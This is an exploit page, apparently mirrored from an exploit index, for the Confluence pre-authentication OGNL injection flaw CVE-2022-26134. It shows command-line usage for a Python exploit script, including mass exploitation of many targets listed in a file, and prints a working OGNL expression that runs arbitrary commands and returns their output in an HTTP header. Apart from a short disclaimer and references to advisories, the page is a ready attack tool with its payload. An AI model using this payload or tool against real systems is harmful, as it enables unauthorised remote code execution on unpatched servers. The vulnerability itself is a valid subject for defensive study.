Share
## https://sploitus.com/exploit?id=9408CE26-37BB-5A4C-9440-BAB53E658A12
# Confluence Pre-Auth Remote Code Execution via OGNL Injection (CVE-2022-26134)
Confluence Pre-Auth Remote Code Execution via OGNL Injection (CVE-2022-26134)

- On June 02, 2022 Atlassian released a security advisory for their Confluence Server and Data Center applications, highlighting a critical severity unauthenticated remote code execution vulnerability. The OGNL injection vulnerability allows an unauthenticated user to execute arbitrary code on a Confluence Server or Data Center instance.

### IMPORTANT
This exploit is only intended to facilitate demonstrations of the vulnerability by researchers. I didn't recommend of illegal actions and take no responsibility for any malicious use of this script. 


#### โ€ข Request Example
![]()![BurpRequest](https://user-images.githubusercontent.com/6265911/172087965-68f12d26-e3c7-429d-b2c5-639121922f1e.png)


### Exploit Usage

```
python3 exploit.py -h
Usage: exploit.py [options]

Options:
  -h, --help            show this help message and exit
  -u URL, --url=URL     Base target uri (ex. http://target-uri/)
  -f FILEHOSTS, --file=FILEHOSTS
                        example.txt
  -t THREADS_SET, --threads=THREADS_SET
  -m TIMEOUT, --maxtimeout=TIMEOUT
  -o OUTPUT, --output=OUTPUT
  -c COMMAND, --cmd=COMMAND
  ```
  

#### Exploit single target:
`$ python3 exploit.py -u http://xxxxx.com -c id`

![]()![xpl1](https://user-images.githubusercontent.com/6265911/172089213-ea07c33f-8944-41c5-b6fc-8f3e9250d928.PNG)



#### Exploit multitargets
`$ python3 exploit.py -f urls.txt -p -c id `

![]()![xpl2](https://user-images.githubusercontent.com/6265911/172089219-3300095f-2ee8-417a-944f-01d32c8aedef.PNG)



# OGNL expression
```${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("id").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}```



# References:
 โ€ข [https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html](https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html)
 
 โ€ข [https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis](https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis)